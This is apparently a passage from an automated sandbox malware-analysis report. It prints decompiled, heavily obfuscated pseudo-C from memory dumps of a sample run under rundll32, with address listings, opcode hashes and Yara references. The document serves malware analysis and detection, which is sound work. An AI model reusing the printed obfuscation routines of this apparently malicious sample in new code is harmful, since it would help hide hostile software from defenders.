					if(_t109 == 0x2e) {
						 *_t120 = 0;
					} else {
						 *_t120 = _t109;
						_t120 = _t120 + 1;
						_t139 = _t139 + 1;
						continue;
					}
					L6:
					_t140 = E0020F22A(_v44, _v12,  &_v304, _v28);
					if(_t140 != 0) {
						L8:
						_push(E00218634(_v40, _t139 + 1, _v16) ^ 0x762b677b);
						_push(_t140);
						return E00210126(_v32, _v24);
					}
					_t115 = E00214AAF( &_v304, _v36, _v8, _v20);
					_t140 = _t115;
					if(_t140 != 0) {
						goto L8;
					}
					return _t115;
				}
				goto L6;
			}

0x00218ae5
0x00218aee
0x00218af5
0x00218afc
0x00218b03
0x00218b0e
0x00218b10
0x00218b15
0x00218b1a
0x00218b21
0x00218b28
0x00218b2f
0x00218b36
0x00218b3d
0x00218b44
0x00218b4b
0x00218b52
0x00218b59
0x00218b60
0x00218b67
0x00218b6e
0x00218b75
0x00218b7c
0x00218b83
0x00218b8a
0x00218b92
0x00218b95
0x00218b98
0x00218b9f
0x00218ba6
0x00218baa
0x00218bb1
0x00218bb8
0x00218bbc
0x00218bc0
0x00218bc7
0x00218bce
0x00218bdc
0x00218bdf
0x00218be6
0x00218bed
0x00218bf8
0x00218bf9
0x00218c01
0x00218c07
0x00218c0a
0x00218c11
0x00218c22
0x00218c22
0x00218c26
0x00000000
0x00000000
0x00218c1c
0x00218c2a
0x00218c1e
0x00218c1e
0x00218c20
0x00218c21
0x00000000
0x00218c21
0x00218c2d
0x00218c42
0x00218c48
0x00218c66
0x00218c7f
0x00218c80
0x00000000
0x00218c86
0x00218c59
0x00218c5e
0x00218c64
0x00000000
0x00000000
0x00218c8e
0x00218c8e
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction ID: 051cc26aa2e500a973cae81107fa1f1685d6de1dda17b07e69ce5a49a31bab59
Opcode Fuzzy Hash: 94b0c3d6e61e61ea0f224150d988a8d30d783f5daa19532cd6a56022687b62a3
Instruction Fuzzy Hash: 4E514271C0120ADFDF48CFA0C98A5EEBBB1FB54304F20819AC011B62A0D7B91A95CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 002048BD, Relevance: .1, Instructions: 107
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E002048BD(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				unsigned int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				void* _t84;
				intOrPtr* _t95;
				signed int _t103;
				signed int _t104;
				void* _t105;
				signed int _t108;
				void* _t122;

				_t122 = __ecx;
				_push(0x21c110);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0020602B(_t84);
				_v48 = 0x61abc6;
				_v44 = 0;
				_v40 = 0;
				_v20 = 0x3115;
				_v20 = _v20 >> 0xf;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x0000604b;
				_v16 = 0xb2e9;
				_v16 = _v16 >> 0xf;
				_v16 = _v16 + 0x4f02;
				_v16 = _v16 ^ 0x00000d08;
				_v8 = 0x47ff;
				_v8 = _v8 + 0xba3e;
				_t103 = 0x68;
				_v8 = _v8 / _t103;
				_t104 = 0x36;
				_v8 = _v8 * 0x26;
				_v8 = _v8 ^ 0x00006b48;
				_v12 = 0x7283;
				_v12 = _v12 + 0xffffff70;
				_v12 = _v12 >> 5;
				_v12 = _v12 | 0x62bbfeca;
				_v12 = _v12 ^ 0x62bbef9f;
				_v32 = 0x955e;
				_v32 = _v32 + 0x386b;
				_v32 = _v32 ^ 0x0000cdee;
				_v36 = 0x2587;
				_v36 = _v36 ^ 0xc63d9950;
				_v36 = _v36 ^ 0xc63dc5f3;
				_v28 = 0xb9df;
				_v28 = _v28 ^ 0xf1a14283;
				_v28 = _v28 * 0x63;
				_v28 = _v28 ^ 0x71a43d80;
				_v24 = 0x4453;
				_v24 = _v24 << 3;
				_t105 = 0x4c;
				_v24 = _v24 / _t104;
				_v24 = _v24 ^ 0x00004bab;
				_t95 = E00208736(_t105);
				 *0x21ca38 = _t95;
				if(_t95 == 0) {
					L7:
					return 0;
				}
				_t108 =  *(_t95 + 0x3c);
				 *((intOrPtr*)(_t95 + 0x14)) = 0x21c110;
				 *_t95 = 0x21c110;
				 *((intOrPtr*)(_t95 + 0x24)) = 0;
				while( *((intOrPtr*)(0x21c110 + _t108 * 8)) != 0) {
					_t108 = _t108 + 1;
					 *(_t95 + 0x3c) = _t108;
				}
				if(E00201CFA(_v32, _t122) == 0) {
					E0020F536(_v36, _v28, _v24,  *0x21ca38);
					goto L7;
				}
				return 1;
			}

0x002048cb
0x002048cd
0x002048ce
0x002048d1
0x002048d4
0x002048d5
0x002048d6
0x002048db
0x002048e4
0x002048e9
0x002048ec
0x002048f3
0x002048f7
0x002048fb
0x00204902
0x00204909
0x0020490d
0x00204914
0x0020491b
0x00204922
0x0020492e
0x00204933
0x0020493c
0x00204940
0x00204943
0x0020494a
0x00204951
0x00204958
0x0020495c
0x00204963
0x0020496a
0x00204971
0x00204978
0x0020497f
0x00204986
0x0020498d
0x00204994
0x0020499b
0x002049a8
0x002049ab
0x002049b2
0x002049b9
0x002049c2
0x002049c3
0x002049c6
0x002049d6
0x002049db
0x002049e4
0x00204a2c
0x00000000
0x00204a2c
0x002049e6
0x002049e9
0x002049ec
0x002049ee
0x002049f7
0x002049f3
0x002049f4
0x002049f4
0x00204a0f
0x00204a25
0x00000000
0x00204a2b
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2884d759d778a785d48a2742c8a63105176aa3218860938089c2220b82319143
Instruction ID: a41d55719872b1fe9a097e5be7c4c1972f07c291ce8fdc7320bc25587970c91c
Opcode Fuzzy Hash: 2884d759d778a785d48a2742c8a63105176aa3218860938089c2220b82319143
Instruction Fuzzy Hash: EA4168B6D10209EFDB08CFA5D9864EEFBB1FF44314F20805AD500B6291D7B44A54CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1003B473, Relevance: .1, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5db8ec2e93bb3c38e6df5de28dcf86fd2157e8b95cfc68f7cb888f4e7748f06
Instruction ID: c656b33352300da800f92d77f99945cd2624eeeb88646af4ccbb705aeb87cfb2
Opcode Fuzzy Hash: f5db8ec2e93bb3c38e6df5de28dcf86fd2157e8b95cfc68f7cb888f4e7748f06
Instruction Fuzzy Hash: B421B673F208394B770CC47E8C5227DB6E1C68C501745823AE8A6EA2C1D968D917E2E4

Uniqueness

Uniqueness Score: -1.00%

Function 1003B353, Relevance: .1, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff4470906935fb6da286988e7cec8f6d249cf1e5048b605e0ab24020fcbcac25
Instruction ID: 5dbac31fb3b63a5ed1dfcc0efb926e611d3acf2d5e288823d8aadfd5aa1fbe56
Opcode Fuzzy Hash: ff4470906935fb6da286988e7cec8f6d249cf1e5048b605e0ab24020fcbcac25
Instruction Fuzzy Hash: AE117323F30C355B675C81A98C172AAA5D2EBD815470F533AD826EB284E9A4DE23D290

Uniqueness

Uniqueness Score: -1.00%

Function 002167E9, Relevance: .1, Instructions: 78
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002167E9() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t116;
				intOrPtr* _t143;
				intOrPtr _t146;
				void* _t151;
				void* _t152;

				_t152 = _t151 - 0x2c;
				_v8 = 0xa05a;
				_v8 = _v8 | 0x4de4d3b6;
				_push(0x77);
				_t143 = 0x21ca24;
				_push(0x67);
				_v8 = _v8 / 0;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 ^ 0x000036e5;
				_v44 = 0x8c67;
				_v44 = _v44 * 0x22;
				_v44 = _v44 ^ 0x00129d81;
				_v24 = 0xef;
				_v24 = _v24 + 0xffff82ae;
				_v24 = _v24 >> 4;
				_v24 = _v24 ^ 0x0fffc315;
				_v12 = 0xac64;
				_v12 = _v12 >> 6;
				_v12 = _v12 / 0;
				_v12 = _v12 ^ 0x56eede11;
				_v12 = _v12 ^ 0x56ee9803;
				_v32 = 0x5470;
				_v32 = _v32 >> 1;
				_v32 = _v32 << 7;
				_v32 = _v32 ^ 0x00150b15;
				_v36 = 0xc745;
				_v36 = _v36 >> 0xb;
				_v36 = _v36 >> 8;
				_v36 = _v36 ^ 0x00006261;
				_v16 = 0x5384;
				_v16 = _v16 | 0x59782290;
				_v16 = _v16 << 2;
				_v16 = _v16 + 0xffff2741;
				_v16 = _v16 ^ 0x65e0bd40;
				_v20 = 0x334d;
				_v20 = _v20 | 0xb04f2549;
				_v20 = _v20 + 0xf20e;
				_v20 = _v20 + 0x9932;
				_v20 = _v20 ^ 0xb050c5c9;
				_v40 = 0xe415;
				_v40 = _v40 * 0x55;
				_v40 = _v40 + 0x2e22;
				_v40 = _v40 ^ 0x004bf03f;
				_v48 = 0x3d8d;
				_v48 = _v48 << 1;
				_v48 = _v48 ^ 0x00006d20;
				_v28 = 0x48e5;
				_v28 = _v28 << 3;
				_v28 = _v28 << 0xe;
				_v28 = _v28 ^ 0x91ca0000;
				_t146 =  *0x21ca24; // 0x0
				while(_t146 != 0) {
					if( *((intOrPtr*)(_t146 + 0x28)) == 0) {
						L5:
						 *_t143 =  *((intOrPtr*)(_t146 + 0x2c));
						_t116 = E0020F536(_v20, _v40, _v48, _t146);
					} else {
						_t116 = E0021086F(_v8, _v44,  *((intOrPtr*)(_t146 + 0x1c)), 0, _v24);
						_t152 = _t152 + 0xc;
						if(_t116 != _v28) {
							_t108 = _t146 + 0x2c; // 0x2c
							_t143 = _t108;
						} else {
							 *((intOrPtr*)(_t146 + 4))( *((intOrPtr*)(_t146 + 0x28)), 0, 0);
							E0021422C(_v12,  *((intOrPtr*)(_t146 + 0x28)), _v32);
							E00214F7D(_v36, _v16,  *((intOrPtr*)(_t146 + 0x1c)));
							goto L5;
						}
					}
					_t146 =  *_t143;
				}
				return _t116;
			}

0x002198a6
0x002198a9
0x002198b2
0x002198bf
0x002198c3
0x002198cb
0x002198cd
0x002198d2
0x002198d6
0x002198dd
0x002198e9
0x002198ec
0x002198f3
0x002198fa
0x00219901
0x00219905
0x0021990c
0x00219913
0x0021991c
0x0021991f
0x00219926
0x0021992d
0x00219934
0x00219937
0x0021993b
0x00219942
0x00219949
0x0021994d
0x00219951
0x00219958
0x0021995f
0x00219966
0x0021996a
0x00219971
0x00219978
0x0021997f
0x00219986
0x0021998d
0x00219994
0x0021999b
0x002199a6
0x002199a9
0x002199b0
0x002199b7
0x002199be
0x002199c1
0x002199c8
0x002199cf
0x002199d3
0x002199d7
0x002199de
0x00219a46
0x002199ea
0x00219a2e
0x00219a3b
0x00219a3d
0x002199ec
0x002199f9
0x002199fe
0x00219a04
0x00219a51
0x00219a51
0x00219a06
0x00219a0d
0x00219a19
0x00219a27
0x00000000
0x00219a2d
0x00219a04
0x00219a44
0x00219a44
0x00219a50

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff846151d5813fc4092f4af61d6b4c81b14f5f6cd6b1d6a9be14af2c6eed00b
Instruction ID: 70be026078753c85ee0f08ae3177f9a64cc62dbe71abe31c5974854e8c4cd855
Opcode Fuzzy Hash: 2ff846151d5813fc4092f4af61d6b4c81b14f5f6cd6b1d6a9be14af2c6eed00b
Instruction Fuzzy Hash: 9F410171D0131DDBDB49CFA5D68A4DEBBB0BB14758F208059C115BA290C7B80B89CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00217A0F, Relevance: .1, Instructions: 66
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00217A0F(void* __ecx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t43;
				void* _t47;
				void* _t50;
				void* _t56;
				void* _t57;

				_t50 = __ecx;
				_v16 = 0xca2c;
				_v16 = _v16 ^ 0x4de68128;
				_v16 = _v16 ^ 0x4de62eb9;
				_v8 = 0x8c11;
				_v8 = _v8 + 0x5792;
				_v8 = _v8 ^ 0x1f44ca2d;
				_v8 = _v8 << 0xa;
				_v8 = _v8 ^ 0x10a60930;
				_v28 = 0x568d;
				_v28 = _v28 >> 6;
				_v28 = _v28 ^ 0x00005e22;
				_v24 = 0x104e;
				_v24 = _v24 << 0x10;
				_v24 = _v24 ^ 0x104e2f39;
				_v20 = 0x2b0b;
				_v20 = _v20 << 5;
				_v20 = _v20 ^ 0x000512d1;
				_v12 = 0x980d;
				_v12 = _v12 + 0x309b;
				_v12 = _v12 >> 1;
				_t56 = 0;
				_v12 = _v12 ^ 0x00001aed;
				_t43 = 0xce8bfa4;
				do {
					while(_t43 != 0xce8bfa4) {
						if(_t43 == 0x19c25828) {
							_push(_t50);
							_t47 = E00217F1B();
							_t57 = _t57 + 4;
							_t56 = _t56 + _t47;
							_t43 = 0x375743b0;
							continue;
						} else {
							if(_t43 != 0x375743b0) {
								goto L8;
							} else {
								_t56 = _t56 + E0020D64E(_v28, _v24, _v20, _t50 + 4, _v12);
							}
						}
						L5:
						return _t56;
					}
					_t43 = 0x19c25828;
					L8:
				} while (_t43 != 0x2a4614b);
				goto L5;
			}

0x00217a0f
0x00217a15
0x00217a21
0x00217a28
0x00217a2f
0x00217a36
0x00217a3d
0x00217a44
0x00217a48
0x00217a4f
0x00217a56
0x00217a5a
0x00217a61
0x00217a68
0x00217a6c
0x00217a73
0x00217a7a
0x00217a7e
0x00217a86
0x00217a92
0x00217a99
0x00217aa3
0x00217aa5
0x00217aac
0x00217aae
0x00217aae
0x00217ab4
0x00217ae3
0x00217ae4
0x00217ae9
0x00217aec
0x00217aee
0x00000000
0x00217ab6
0x00217ab8
0x00000000
0x00217aba
0x00217ad2
0x00217ad2
0x00217ab8
0x00217ad5
0x00217adc
0x00217adc
0x00217af2
0x00217af4
0x00217af4
0x00000000

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction ID: d5d2be855888b33b735ee1d7b7ff77e4bbf9d12a50c3da27b4ecd403224063e7
Opcode Fuzzy Hash: 362bc142d129daebced84241c2bae281a61a82d17f508644e8d31eb90b62e200
Instruction Fuzzy Hash: A4218971E14219ABDB44DEA4D88A4EFBBB0FF50308F648059D505A3241E3B54B94CF91

Uniqueness

Uniqueness Score: -1.00%

Function 0021687F, Relevance: .1, Instructions: 60
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0021687F(void* __ecx, signed int __edx, void* __eflags) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				signed int _t63;
				signed int _t72;

				_v32 = 4;
				_v8 = 0xaf15;
				_v8 = _v8 << 0xf;
				_v8 = _v8 >> 0xa;
				_v8 = _v8 + 0x6e7b;
				_v8 = _v8 ^ 0x2016511b;
				_v24 = 0x477;
				_v24 = _v24 + 0xffffb380;
				_t72 = 0x7f;
				_v24 = _v24 / _t72;
				_v24 = _v24 ^ 0x02042a92;
				_v20 = 0x93b6;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x44f1257f;
				_v20 = _v20 ^ 0x44eaddee;
				_v16 = 0x6bfa;
				_v16 = _v16 >> 0xa;
				_v16 = _v16 + 0xffff28a3;
				_v16 = _v16 ^ 0xffff7b62;
				_v28 = 0xaf58;
				_v28 = _v28 ^ 0x6486cb7d;
				_v28 = _v28 ^ 0x6486241a;
				_v12 = 0x7e30;
				_v12 = _v12 + 0x9611;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0x22884747;
				_t63 = E0021674B( &_v36, _v24, __ecx, _v8 | __edx, __ecx, _v20,  &_v32, _v16, _v28, _v12);
				asm("sbb eax, eax");
				return  ~_t63 & _v36;
			}

0x00216885
0x0021688c
0x00216893
0x00216897
0x0021689b
0x002168a2
0x002168a9
0x002168b0
0x002168be
0x002168c5
0x002168c8
0x002168cf
0x002168da
0x002168e0
0x002168e7
0x002168ee
0x002168f5
0x002168f9
0x00216900
0x00216907
0x0021690e
0x00216915
0x0021691c
0x00216923
0x0021692a
0x0021692e
0x00216950
0x0021695a
0x00216964

Memory Dump Source

Source File: 00000007.00000002.2087918184.0000000000201000.00000020.00000001.sdmp, Offset: 00200000, based on PE: true

Associated: 00000007.00000002.2087915544.0000000000200000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2087930443.000000000021C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_200000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction ID: 6d333d990c3cf59c37235d3efbd9c34b6741ae4dc63b4ff88125bcd5beb7bd22
Opcode Fuzzy Hash: fe6ba01be8fb5c0da9d2f06e75f2fa44d8968acd521b874d952cc1c4be9b7d87
Instruction Fuzzy Hash: FF21E0B2D0021EABDB15CFE1C94A9EEFBB5FB10204F108299D521B61A0D3B84B59CF91

Uniqueness

Uniqueness Score: -1.00%

Function 100267F4, Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c00fd64b0b6dbcb9beef7772090face0066cd63d527137d98a1fd5bd32765b9d
Instruction ID: 66eff15202111fccf0a7c8d95225fb2e7e16f9dcd535e74fd26a087092d39107
Opcode Fuzzy Hash: c00fd64b0b6dbcb9beef7772090face0066cd63d527137d98a1fd5bd32765b9d
Instruction Fuzzy Hash: E0F0F032A54260ABC712CA5CAE55B48B7E8EB09B44F910291E602EB390CEB0DE00C3D0

Uniqueness

Uniqueness Score: -1.00%

Function 1002661A, Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22b61ba2a9695860e569c319edc5e6c5c71dde289f66b2b5d25be8a0529388c6
Instruction ID: 97217ad8dba5d0129fa98ca899641cafd385c0dc8ad7bdfbb9e94792b3533daa
Opcode Fuzzy Hash: 22b61ba2a9695860e569c319edc5e6c5c71dde289f66b2b5d25be8a0529388c6
Instruction Fuzzy Hash: 4EF0BE31A44285EFC742CE68FE59F08B7ECEB0D788FA04064E506DB290D679DE41C645

Uniqueness

Uniqueness Score: -1.00%

Function 1002673B, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dff28dc1353b6c53b1631460b6cb349a2ba39b5b7b5be24c05d17d60e649c85
Instruction ID: ca156b4c271f2ff34e0ad3de557cffee8235d24b156648402bbee209443292bf
Opcode Fuzzy Hash: 5dff28dc1353b6c53b1631460b6cb349a2ba39b5b7b5be24c05d17d60e649c85
Instruction Fuzzy Hash: 10F03031A152649BCB12C748E845A49B3B8EB49B99F624096F501D7151D774DD00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 1002677F, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e11fc5522e44f442ff0deca1848ac05b4e2fdde56076012e59bc32853a84426
Instruction ID: 4afadca5389b6c2ce084e556022d067b21007e73e6122fbfdd99eaffe65c0e9f
Opcode Fuzzy Hash: 7e11fc5522e44f442ff0deca1848ac05b4e2fdde56076012e59bc32853a84426
Instruction Fuzzy Hash: E4F03932A15674ABCB12CB4CE845B89B3ECEB49B98F520896E401E7251E7B4EE40C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 10026594, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76c60b7a9c3335ad2bb66ef415c2b8a6f28546c29e462a0ce88d083db758f99f
Instruction ID: 81a2276f03d9370e80cb445c887315b7debc13d61a8c89ba6614dea0100d47d2
Opcode Fuzzy Hash: 76c60b7a9c3335ad2bb66ef415c2b8a6f28546c29e462a0ce88d083db758f99f
Instruction Fuzzy Hash: 63E09A35601788EFCB45CF68C984A09B7F8EB49788FA140A8F40AC7650E734EE40CB00

Uniqueness

Uniqueness Score: -1.00%

Function 100265D7, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6683db459a5caa38be91c53a785bec01800b869b12607d8a309da49395bc70f
Instruction ID: 9d18ab41e59b4812c29f078e082888d16a671906bc359d3429e04bd75a6d48b8
Opcode Fuzzy Hash: e6683db459a5caa38be91c53a785bec01800b869b12607d8a309da49395bc70f
Instruction Fuzzy Hash: 0AE06535A00288EFCB06CB68CA54B49B3E8FB49388FA148A8E409D7750E334EE40CB40

Uniqueness

Uniqueness Score: -1.00%

Function 100267C3, Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70c87a0f1a145202a697aae52e1c315a29966a3fd9373b6e61b6c42afe08dbea
Instruction ID: 19a26b7e9baf58ff5a1a5caac36cc593f268b1ea3bed36a77940ec1a48f2df19
Opcode Fuzzy Hash: 70c87a0f1a145202a697aae52e1c315a29966a3fd9373b6e61b6c42afe08dbea
Instruction Fuzzy Hash: B8E08C32915238EBCB11CBC8E90098AF3ECEB48A44B510096F502D3101C271DE00CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 10026675, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092178755.000000001004D000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2092184275.000000001004F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_10000000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93ce1a00d23dfb0527f68975886b101968f7ce1ea99dee50bd5d74cdbc1fed38
Instruction ID: 18467db992a203f67c367f55b36483cc5fe9a7cfd7d8114d5e86e5a373ec6e19
Opcode Fuzzy Hash: 93ce1a00d23dfb0527f68975886b101968f7ce1ea99dee50bd5d74cdbc1fed38
Instruction Fuzzy Hash: 8DE0E275901248EFCB00CBA8D949B8AB7F8EB48794F9548A4E406D7251D234EE84DA00

Uniqueness

Uniqueness Score: -1.00%

Function 100106EC, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2092135552.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2092131454.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2092170469.0000000010042000.00000002.00020000.sdmp Download File
